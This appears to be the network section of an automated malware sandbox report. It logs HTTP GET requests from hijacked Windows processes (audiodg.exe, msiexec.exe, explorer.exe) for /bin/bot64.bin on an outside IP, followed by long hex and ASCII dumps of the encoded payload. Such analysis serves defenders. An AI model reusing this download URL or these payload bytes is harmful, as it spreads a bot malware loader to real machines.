                                                                                                                                                                                                                                                  Data Ascii: !e!j!)nC#)F!S!b!pB!y!e!j!)nCj#)F!p!S'!aBNUU!e!zBbHUUjx!eB1YUU!aBY!e!zB2!!m)niffffffffff#)F!p!S'!aBIIUU'!bB|IUU!e!zBHUUjx!eBYUU)cUj!y!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:19.906989098 CET1236INData Raw: aa 2f 6a de 82 a5 b5 2e aa aa aa aa aa e2 27 fe 8e ea e2 27 e6 8e 8a 42 eb a6 aa aa e2 27 fe 8e ea e2 21 65 42 d6 d0 ab aa 2f 6a df 4a e2 27 fe 8e 8a e2 21 61 42 f9 8e ab aa e2 27 e6 8e 8a 42 63 57 55 55 e2 21 69 e2 21 26 8e da ab aa aa e2 99 66
                                                                                                                                                                                                                                                  Data Ascii: /j.''B'!eB/jJ'!aB'BcWUU!i!&fB<0!62+n*ifffff+F"!=n#!S'!Z!HB@TUU'!|BGVUU'!zBZ!d!zBWUU'B!JUUj'!ZB!B/j.f#r
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.030632019 CET1236INData Raw: e2 21 62 42 0b a4 aa aa e2 2f 6a df af eb 21 74 41 a6 29 60 55 e2 21 62 55 bf 11 10 a8 aa e2 21 65 55 bf 38 10 a8 aa 21 69 e2 21 e6 8e e2 e2 99 66 42 49 3f ab aa e2 29 6e fa eb f4 f5 f4 f7 f1 69 66 66 66 66 66 66 66 66 e2 23 f6 8e ba fd e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: !bB/j!tA)`U!bU!eU8!i!fBI?)niffffffff#)F)!p!S!UjBXUUA'BvUU!i!}!bBpUUm!jx#!!a#!)nC/AUUfffff##")FS!Z!p)RBAUU''BcGUU!


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  1192.168.2.449731176.111.174.140807020C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:18.776393890 CET203OUTGET /bin/bot64.bin HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127399921 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:19 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 23:48:31 GMT
                                                                                                                                                                                                                                                  ETag: "43a00-6283e11c07987"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 276992
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Data Raw: e7 f0 3a aa a9 aa aa aa ae aa aa aa 55 55 aa aa 12 aa aa aa aa aa aa aa ea aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ab aa aa a4 b5 10 a4 aa 1e a3 67 8b 12 ab e6 67 8b fe c2 c3 d9 8a da d8 c5 cd d8 cb c7 8a c9 cb c4 c4 c5 de 8a c8 cf 8a d8 df c4 8a c3 c4 8a ee e5 f9 8a c7 c5 ce cf 84 a7 a7 a0 8e aa aa aa aa aa aa aa 73 b0 ec 0e 37 d1 82 5d 37 d1 82 5d 37 d1 82 5d f3 14 4f 5d 3d d1 82 5d f3 14 4d 5d 76 d1 82 5d f3 14 4c 5d 86 d1 82 5d 37 d1 83 5d 95 d1 82 5d cb a6 3b 5d 26 d1 82 5d 10 17 4c 5d 32 d1 82 5d 10 17 4d 5d 2d d1 82 5d 10 17 48 5d 36 d1 82 5d 10 17 4b 5d 36 d1 82 5d 10 17 4e 5d 36 d1 82 5d f8 c3 c9 c2 37 d1 82 5d aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa fa ef aa aa ce 2c ac aa 48 2e e6 cd aa aa aa aa aa aa aa aa 5a aa 88 8a a1 a8 a1 aa aa 7e a8 aa aa ac a8 aa aa aa aa aa 1a 71 ab aa aa ba aa aa aa aa aa 2a ab aa aa aa aa ba aa aa aa a8 aa aa ac aa aa aa aa aa aa aa ac aa aa aa aa aa aa aa aa 8a [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: :UUggs7]7]7]O]=]M]v]L]]7]];]&]L]2]M]-]H]6]K]6]N]6]7],H.Z~q*ffJJZZy~vZtrbzjvJJBZ
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127434015 CET1236INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa e2 29 46 82 99 6a e2 2f 63 de ba e2 29 53 55 dd a5 42 50 02 ab
                                                                                                                                                                                                                                                  Data Ascii: )Fj/c)SUBP/j)niB7fffffffffff#)F!S!b!pBb'!y!e!j!)nC#)F!RBc!r/j!eB#'!#!)niffffffff#)F!S!b!pB'
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127445936 CET448INData Raw: a2 e2 23 ee 8e fa e2 21 ec ba e2 23 f6 8e f2 e2 23 ee 8e ca e7 c9 dd 96 99 6a e2 27 e7 82 99 78 eb 12 62 ae aa aa e2 23 d7 2a e7 a9 5d e2 23 ef 22 e2 23 ef 3a e2 23 ef 32 e2 23 ef 0a e2 23 ef 02 e2 23 d7 8a 42 15 9b ab aa e2 27 ff 8a e2 21 61 6d
                                                                                                                                                                                                                                                  Data Ascii: #!##j'xb#*]#"#:#2###B'!amU!q/j.!!!mU(q!!m#!!z#Uq/j.e!]'4.!R!!V!m#Uq/j.
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127558947 CET1236INData Raw: ac aa aa eb f4 eb f7 eb f6 f5 f4 f7 69 66 66 66 66 66 66 66 66 66 66 66 66 e2 23 f6 8e a2 ff fc fd eb fc eb fd e2 29 46 ea 99 55 e7 21 52 e2 21 70 eb 23 92 e6 21 5b cc 3a ef 99 63 e2 27 a7 0c 4a a8 aa ef 99 6a eb 27 fb ab 23 d6 8e 8a 55 bf ff 77
                                                                                                                                                                                                                                                  Data Ascii: iffffffffffff#)FU!R!p#![:c'Jj'#Uw!B/j"U0sAzcj!|!b#m.Uw!Z/jcj!y!g#m.Uw!Z/j!gUSv"UsCUUU''!dm#Uv
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127572060 CET1236INData Raw: aa e2 27 e7 0a 55 bf 38 7f a8 aa e2 27 bf 41 76 a8 aa e2 27 e7 0a 55 bf 2b 7f a8 aa e2 27 e7 0a 55 bf d5 72 a8 aa 21 e6 8e ca 10 ab aa aa aa 2f 6a a5 ef 60 e2 27 bf 78 76 a8 aa 99 5c 23 e6 8e ca e2 21 61 55 bf e9 7f a8 aa 2f 6a de d2 e2 27 bf 62
                                                                                                                                                                                                                                                  Data Ascii: 'U8'Av'U+'Ur!/j`'xv\#!aU/j'bv!aU/j'nv!aU/j'jv!aU/j'v!aUY~/j'v!aUu~/j'v!aUa~/j'v!fUm~m'av!aU0~
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127583981 CET1236INData Raw: ee 8e 8a 41 a5 e2 21 de 8e ca e6 21 de 8e da e2 21 d6 8e d2 e7 2f 5c de b2 e2 21 64 42 da ab aa aa e2 21 7a e7 21 6c e2 21 e6 8e 8a 42 ba ae aa aa ef 99 6a 18 ab e2 21 64 42 d9 ab aa aa e2 27 fe 8e c2 e2 21 64 42 5c 5b 55 55 e2 21 62 e6 27 ee 8e
                                                                                                                                                                                                                                                  Data Ascii: A!!!/\!dB!z!l!Bj!dB'!dB\[UU!b'!|B|EUU#!|!dB)nifffffffffffff)F!pl#BS''B!)nifffff##)FZ!p!SBi!!y!eB"TUUA.\)Q
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127595901 CET1236INData Raw: 29 46 8a eb 21 6a e2 21 70 e6 21 6b 21 7a e2 21 61 42 ad 47 55 55 e2 21 69 e2 29 6e 8a f1 69 66 66 66 66 66 66 66 66 66 66 66 66 66 66 e2 23 f6 8e a2 e2 23 de 8e ba fd e2 29 46 8a e2 21 73 e2 21 60 eb 21 5a e2 21 50 42 4a 47 aa aa e2 21 61 e2 21
                                                                                                                                                                                                                                                  Data Ascii: )F!j!p!k!z!aBGUU!i)niffffffffffffff##)F!s!`!Z!PBJG!a!zBGUU.j!eBcl!!)ni!!j)nif)F!!r!h'U!y!bBtFUU)niffffffff###)F!!B!P!sX!lhj/j
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127768040 CET1236INData Raw: e2 e2 21 de 8e ea e2 29 6e 9a f1 69 eb 29 63 55 e6 21 69 99 78 13 43 57 aa aa 23 de 8e 82 e2 23 ee 8e 8a 55 bf a2 6d a8 aa e2 21 de 8e ea e2 21 6d e2 21 d6 8e e2 e2 29 6e 9a f1 69 66 66 66 66 66 66 66 66 66 66 66 66 66 e2 27 af 93 66 a9 aa 69 66
                                                                                                                                                                                                                                                  Data Ascii: !)ni)cU!ixCW##Um!!m!)nifffffffffffff'fiffffffff!ifffffffffffffifffffffffffff)FB-/j>j)nifffffffffffff#)F!S'B'!}!rB!y!b!)nC>UUUffff)FBUUU.j>j)nifffffff
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127780914 CET1236INData Raw: 21 65 42 84 59 55 55 e3 29 63 55 ef 99 6a e2 21 79 e2 21 65 42 a6 5e 55 55 e2 21 f6 8e 92 e2 21 6d e2 29 6e 8a f5 69 66 66 66 66 66 66 66 66 66 66 66 66 66 66 43 11 a3 aa aa 66 66 66 66 66 66 66 66 66 66 66 e2 23 de 8e 8a fd e2 29 46 8a e2 21 58
                                                                                                                                                                                                                                                  Data Ascii: !eBYUU)cUj!y!eB^UU!!m)niffffffffffffffCfffffffffff#)F!X!S`.6j#BbXUU'!dBIUU'!e!rBIUU!y!bBQUU!d.j'B'!d!rB!!!eBVUU!!m!)niB!e!zB!!m!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.127852917 CET1236INData Raw: 77 55 55 99 5c ee 21 69 99 78 13 55 55 b5 aa e2 23 de 8e ea 55 bf 8d 17 a8 aa e2 21 72 e2 2f 6a a5 2e 59 aa aa aa e2 27 a7 9e 6d a8 aa e6 23 de 8e da 55 bf 3b 17 a8 aa e2 27 bf b8 6d a8 aa e2 21 62 55 bf 23 17 a8 aa e2 21 61 e6 21 5a e2 2f 6a df
                                                                                                                                                                                                                                                  Data Ascii: wUU\!ixUU#U!r/j.Y'm#U;'m!bU#!a!Z/jU"C!mx#m!EUe!a!R/j'!g!m!}#U/j#!djx!a##UC/j!bU!aUPA*
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.252288103 CET1236INData Raw: 73 a0 aa aa e2 21 65 e2 21 72 42 04 ae aa aa e2 21 65 e2 81 69 e2 21 f6 8e 9a e2 91 6c d8 8d 42 13 a0 aa aa e2 21 65 e2 27 be ac 42 e7 54 55 55 e2 21 65 e2 21 7a 42 78 54 55 55 e2 21 de 8e 92 e2 29 6e 8a f5 69 42 18 50 aa aa 66 66 ea fd e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: s!e!rB!ei!lB!e'BTUU!e!zBxTUU!)niBPff)F)!S!#`]B!p'kQ!ikBrB'sUU!!b!iB5AUU!j###)nifffffff!`]@kP!hkBhiffffffffffffCf


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  2192.168.2.449732176.111.174.140807076C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:18.816951990 CET203OUTGET /bin/bot64.bin HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176009893 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:19 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 23:48:31 GMT
                                                                                                                                                                                                                                                  ETag: "43a00-6283e11c07987"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 276992
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Data Raw: e7 f0 3a aa a9 aa aa aa ae aa aa aa 55 55 aa aa 12 aa aa aa aa aa aa aa ea aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ab aa aa a4 b5 10 a4 aa 1e a3 67 8b 12 ab e6 67 8b fe c2 c3 d9 8a da d8 c5 cd d8 cb c7 8a c9 cb c4 c4 c5 de 8a c8 cf 8a d8 df c4 8a c3 c4 8a ee e5 f9 8a c7 c5 ce cf 84 a7 a7 a0 8e aa aa aa aa aa aa aa 73 b0 ec 0e 37 d1 82 5d 37 d1 82 5d 37 d1 82 5d f3 14 4f 5d 3d d1 82 5d f3 14 4d 5d 76 d1 82 5d f3 14 4c 5d 86 d1 82 5d 37 d1 83 5d 95 d1 82 5d cb a6 3b 5d 26 d1 82 5d 10 17 4c 5d 32 d1 82 5d 10 17 4d 5d 2d d1 82 5d 10 17 48 5d 36 d1 82 5d 10 17 4b 5d 36 d1 82 5d 10 17 4e 5d 36 d1 82 5d f8 c3 c9 c2 37 d1 82 5d aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa fa ef aa aa ce 2c ac aa 48 2e e6 cd aa aa aa aa aa aa aa aa 5a aa 88 8a a1 a8 a1 aa aa 7e a8 aa aa ac a8 aa aa aa aa aa 1a 71 ab aa aa ba aa aa aa aa aa 2a ab aa aa aa aa ba aa aa aa a8 aa aa ac aa aa aa aa aa aa aa ac aa aa aa aa aa aa aa aa 8a [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: :UUggs7]7]7]O]=]M]v]L]]7]];]&]L]2]M]-]H]6]K]6]N]6]7],H.Z~q*ffJJZZy~vZtrbzjvJJBZ
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176042080 CET1236INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa e2 29 46 82 99 6a e2 2f 63 de ba e2 29 53 55 dd a5 42 50 02 ab
                                                                                                                                                                                                                                                  Data Ascii: )Fj/c)SUBP/j)niB7fffffffffff#)F!S!b!pBb'!y!e!j!)nC#)F!RBc!r/j!eB#'!#!)niffffffff#)F!S!b!pB'
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176055908 CET448INData Raw: a2 e2 23 ee 8e fa e2 21 ec ba e2 23 f6 8e f2 e2 23 ee 8e ca e7 c9 dd 96 99 6a e2 27 e7 82 99 78 eb 12 62 ae aa aa e2 23 d7 2a e7 a9 5d e2 23 ef 22 e2 23 ef 3a e2 23 ef 32 e2 23 ef 0a e2 23 ef 02 e2 23 d7 8a 42 15 9b ab aa e2 27 ff 8a e2 21 61 6d
                                                                                                                                                                                                                                                  Data Ascii: #!##j'xb#*]#"#:#2###B'!amU!q/j.!!!mU(q!!m#!!z#Uq/j.e!]'4.!R!!V!m#Uq/j.
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176110029 CET1236INData Raw: ac aa aa eb f4 eb f7 eb f6 f5 f4 f7 69 66 66 66 66 66 66 66 66 66 66 66 66 e2 23 f6 8e a2 ff fc fd eb fc eb fd e2 29 46 ea 99 55 e7 21 52 e2 21 70 eb 23 92 e6 21 5b cc 3a ef 99 63 e2 27 a7 0c 4a a8 aa ef 99 6a eb 27 fb ab 23 d6 8e 8a 55 bf ff 77
                                                                                                                                                                                                                                                  Data Ascii: iffffffffffff#)FU!R!p#![:c'Jj'#Uw!B/j"U0sAzcj!|!b#m.Uw!Z/jcj!y!g#m.Uw!Z/j!gUSv"UsCUUU''!dm#Uv
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176243067 CET1236INData Raw: aa e2 27 e7 0a 55 bf 38 7f a8 aa e2 27 bf 41 76 a8 aa e2 27 e7 0a 55 bf 2b 7f a8 aa e2 27 e7 0a 55 bf d5 72 a8 aa 21 e6 8e ca 10 ab aa aa aa 2f 6a a5 ef 60 e2 27 bf 78 76 a8 aa 99 5c 23 e6 8e ca e2 21 61 55 bf e9 7f a8 aa 2f 6a de d2 e2 27 bf 62
                                                                                                                                                                                                                                                  Data Ascii: 'U8'Av'U+'Ur!/j`'xv\#!aU/j'bv!aU/j'nv!aU/j'jv!aU/j'v!aUY~/j'v!aUu~/j'v!aUa~/j'v!fUm~m'av!aU0~
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176254988 CET1236INData Raw: ee 8e 8a 41 a5 e2 21 de 8e ca e6 21 de 8e da e2 21 d6 8e d2 e7 2f 5c de b2 e2 21 64 42 da ab aa aa e2 21 7a e7 21 6c e2 21 e6 8e 8a 42 ba ae aa aa ef 99 6a 18 ab e2 21 64 42 d9 ab aa aa e2 27 fe 8e c2 e2 21 64 42 5c 5b 55 55 e2 21 62 e6 27 ee 8e
                                                                                                                                                                                                                                                  Data Ascii: A!!!/\!dB!z!l!Bj!dB'!dB\[UU!b'!|B|EUU#!|!dB)nifffffffffffff)F!pl#BS''B!)nifffff##)FZ!p!SBi!!y!eB"TUUA.\)Q
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176266909 CET1236INData Raw: 29 46 8a eb 21 6a e2 21 70 e6 21 6b 21 7a e2 21 61 42 ad 47 55 55 e2 21 69 e2 29 6e 8a f1 69 66 66 66 66 66 66 66 66 66 66 66 66 66 66 e2 23 f6 8e a2 e2 23 de 8e ba fd e2 29 46 8a e2 21 73 e2 21 60 eb 21 5a e2 21 50 42 4a 47 aa aa e2 21 61 e2 21
                                                                                                                                                                                                                                                  Data Ascii: )F!j!p!k!z!aBGUU!i)niffffffffffffff##)F!s!`!Z!PBJG!a!zBGUU.j!eBcl!!)ni!!j)nif)F!!r!h'U!y!bBtFUU)niffffffff###)F!!B!P!sX!lhj/j
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176279068 CET1236INData Raw: e2 e2 21 de 8e ea e2 29 6e 9a f1 69 eb 29 63 55 e6 21 69 99 78 13 43 57 aa aa 23 de 8e 82 e2 23 ee 8e 8a 55 bf a2 6d a8 aa e2 21 de 8e ea e2 21 6d e2 21 d6 8e e2 e2 29 6e 9a f1 69 66 66 66 66 66 66 66 66 66 66 66 66 66 e2 27 af 93 66 a9 aa 69 66
                                                                                                                                                                                                                                                  Data Ascii: !)ni)cU!ixCW##Um!!m!)nifffffffffffff'fiffffffff!ifffffffffffffifffffffffffff)FB-/j>j)nifffffffffffff#)F!S'B'!}!rB!y!b!)nC>UUUffff)FBUUU.j>j)nifffffff
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176517963 CET1236INData Raw: 21 65 42 84 59 55 55 e3 29 63 55 ef 99 6a e2 21 79 e2 21 65 42 a6 5e 55 55 e2 21 f6 8e 92 e2 21 6d e2 29 6e 8a f5 69 66 66 66 66 66 66 66 66 66 66 66 66 66 66 43 11 a3 aa aa 66 66 66 66 66 66 66 66 66 66 66 e2 23 de 8e 8a fd e2 29 46 8a e2 21 58
                                                                                                                                                                                                                                                  Data Ascii: !eBYUU)cUj!y!eB^UU!!m)niffffffffffffffCfffffffffff#)F!X!S`.6j#BbXUU'!dBIUU'!e!rBIUU!y!bBQUU!d.j'B'!d!rB!!!eBVUU!!m!)niB!e!zB!!m!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.176534891 CET1236INData Raw: 77 55 55 99 5c ee 21 69 99 78 13 55 55 b5 aa e2 23 de 8e ea 55 bf 8d 17 a8 aa e2 21 72 e2 2f 6a a5 2e 59 aa aa aa e2 27 a7 9e 6d a8 aa e6 23 de 8e da 55 bf 3b 17 a8 aa e2 27 bf b8 6d a8 aa e2 21 62 55 bf 23 17 a8 aa e2 21 61 e6 21 5a e2 2f 6a df
                                                                                                                                                                                                                                                  Data Ascii: wUU\!ixUU#U!r/j.Y'm#U;'m!bU#!a!Z/jU"C!mx#m!EUe!a!R/j'!g!m!}#U/j#!djx!a##UC/j!bU!aUPA*
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:20.342753887 CET1236INData Raw: 73 a0 aa aa e2 21 65 e2 21 72 42 04 ae aa aa e2 21 65 e2 81 69 e2 21 f6 8e 9a e2 91 6c d8 8d 42 13 a0 aa aa e2 21 65 e2 27 be ac 42 e7 54 55 55 e2 21 65 e2 21 7a 42 78 54 55 55 e2 21 de 8e 92 e2 29 6e 8a f5 69 42 18 50 aa aa 66 66 ea fd e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: s!e!rB!ei!lB!e'BTUU!e!zBxTUU!)niBPff)F)!S!#`]B!p'kQ!ikBrB'sUU!!b!iB5AUU!j###)nifffffff!`]@kP!hkBhiffffffffffffCf


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.449733176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:21.285433054 CET203OUTGET /bin/bot64.bin HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.619997025 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:23:21 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  Last-Modified: Sun, 01 Dec 2024 23:48:31 GMT
                                                                                                                                                                                                                                                  ETag: "43a00-6283e11c07987"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 276992
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Data Raw: e7 f0 3a aa a9 aa aa aa ae aa aa aa 55 55 aa aa 12 aa aa aa aa aa aa aa ea aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa ab aa aa a4 b5 10 a4 aa 1e a3 67 8b 12 ab e6 67 8b fe c2 c3 d9 8a da d8 c5 cd d8 cb c7 8a c9 cb c4 c4 c5 de 8a c8 cf 8a d8 df c4 8a c3 c4 8a ee e5 f9 8a c7 c5 ce cf 84 a7 a7 a0 8e aa aa aa aa aa aa aa 73 b0 ec 0e 37 d1 82 5d 37 d1 82 5d 37 d1 82 5d f3 14 4f 5d 3d d1 82 5d f3 14 4d 5d 76 d1 82 5d f3 14 4c 5d 86 d1 82 5d 37 d1 83 5d 95 d1 82 5d cb a6 3b 5d 26 d1 82 5d 10 17 4c 5d 32 d1 82 5d 10 17 4d 5d 2d d1 82 5d 10 17 48 5d 36 d1 82 5d 10 17 4b 5d 36 d1 82 5d 10 17 4e 5d 36 d1 82 5d f8 c3 c9 c2 37 d1 82 5d aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa fa ef aa aa ce 2c ac aa 48 2e e6 cd aa aa aa aa aa aa aa aa 5a aa 88 8a a1 a8 a1 aa aa 7e a8 aa aa ac a8 aa aa aa aa aa 1a 71 ab aa aa ba aa aa aa aa aa 2a ab aa aa aa aa ba aa aa aa a8 aa aa ac aa aa aa aa aa aa aa ac aa aa aa aa aa aa aa aa 8a [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: :UUggs7]7]7]O]=]M]v]L]]7]];]&]L]2]M]-]H]6]K]6]N]6]7],H.Z~q*ffJJZZy~vZtrbzjvJJBZ
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620012999 CET224INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa e2 29 46 82 99 6a e2 2f 63 de ba e2 29 53 55 dd a5 42 50 02 ab
                                                                                                                                                                                                                                                  Data Ascii: )Fj/c)SUBP/j)niB7fffffffffff#)F!S!b!pBb'!y!e!j!)nC#)F!RBc!r/j!eB#'!#!)niffffffff#
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620028973 CET1236INData Raw: 8e a2 fd e2 29 46 8a e2 21 53 e3 21 62 e2 21 70 42 f2 27 aa aa e2 21 79 e2 21 65 e6 21 6a e2 21 f6 8e 9a e2 29 6e 8a f5 43 3a 55 55 55 ea f9 e2 29 46 8a e2 21 73 42 b8 aa aa aa e2 21 69 e2 29 6e 8a f1 69 66 66 66 66 66 66 66 66 66 99 6a e2 23 eb
                                                                                                                                                                                                                                                  Data Ascii: )F!S!b!pB'!y!e!j!)nC:UUU)F!sB!i)nifffffffffj##!kiff#)F!S'!pB\&!e!zBUUUjx!eB!y!eB!!m)nifffff)F!sB('YN#!i)nifffffffffffffff)F!sBhUUU'O
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620076895 CET1236INData Raw: e2 23 d6 8e 8a 55 bf 8c 71 a8 aa 2f 6a a5 2e 20 aa aa aa eb a5 1d ec ac 55 6c e2 29 69 82 91 5a d6 6d 21 fe 8e c2 e2 21 e6 8e fa e2 27 ee 8e c2 e6 27 ef 2a eb 13 9a aa aa aa e2 23 ee 8e 8a 42 8b 14 a8 aa e2 21 ff 22 e2 21 e6 8e fa e6 27 ee 8e da
                                                                                                                                                                                                                                                  Data Ascii: #Uq/j. Ul)iZm!!''*#B!"!')h#U`p/j!!'#/U-p/j!Up!!Up!Up!eB!!6!m!'ZfB+niffffff
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620089054 CET1236INData Raw: eb fd e2 27 06 8e 82 54 55 55 e2 2b 46 72 a8 aa aa e2 21 af f7 68 a9 aa e2 99 6e e2 23 2f 6a ab aa aa e2 21 2f ea a8 aa aa e2 21 17 da a8 aa aa 23 e6 8e c2 e2 23 ef 3a e2 21 2f f2 a8 aa aa e3 21 62 e2 23 ee 8e d2 e2 21 2f ca a8 aa aa e6 23 e7 2a
                                                                                                                                                                                                                                                  Data Ascii: 'TUU+Fr!hn#/j!/!##:!/!b#!/#*#2!/!P#Ba!e!ZBj!BB!g!JUUr!r/\!|!fUy'xmlB<c'j'c#U1r'^v'U8'Av
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620104074 CET1236INData Raw: 5f 7c a9 aa e6 27 af bc 51 55 55 e2 27 bf 45 73 a8 aa e2 27 a7 8a 70 a8 aa 42 49 cb aa aa 99 63 42 36 c8 aa aa 99 6a e2 29 6e 82 69 66 66 66 66 66 e2 2f 78 de bd cc cc cc a5 b5 2e aa aa aa aa aa ee 9a ab e2 27 e3 ab e2 55 60 df 5e 59 69 66 66 e6
                                                                                                                                                                                                                                                  Data Ascii: _|'QUU'Es'pBIcB6j)nifffff/x.'U`^Yiff###)FmTUUU!Z!p![!P)eB`!bm!QA!!b{C]M{@`!kkj'!S'!dBXUU!b'B)#A!!!
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:22.620115042 CET1236INData Raw: 13 56 55 55 2e 6a de 8b e2 21 61 42 27 57 55 55 e6 21 6d e2 21 7c e2 21 62 42 85 aa aa aa e2 21 7d e2 21 61 42 ce 56 55 55 e2 21 de 8e 92 e2 21 69 e2 21 f6 8e 9a e2 29 6e 8a f5 69 66 a5 1c a8 22 ab 69 66 66 66 66 66 66 66 66 66 66 ea f9 e2 29 46
                                                                                                                                                                                                                                                  Data Ascii: VUU.j!aB'WUU!m!|!bB!}!aBVUU!!i!)nif"iffffffffff)F!s/jB<!i)niffffCfffffffffff!`C?ffffffff#)F!b!R!pBv#/jBAB!j!}!aBGUU!i!)niffffffffffff)F!j!p!k!z!aB
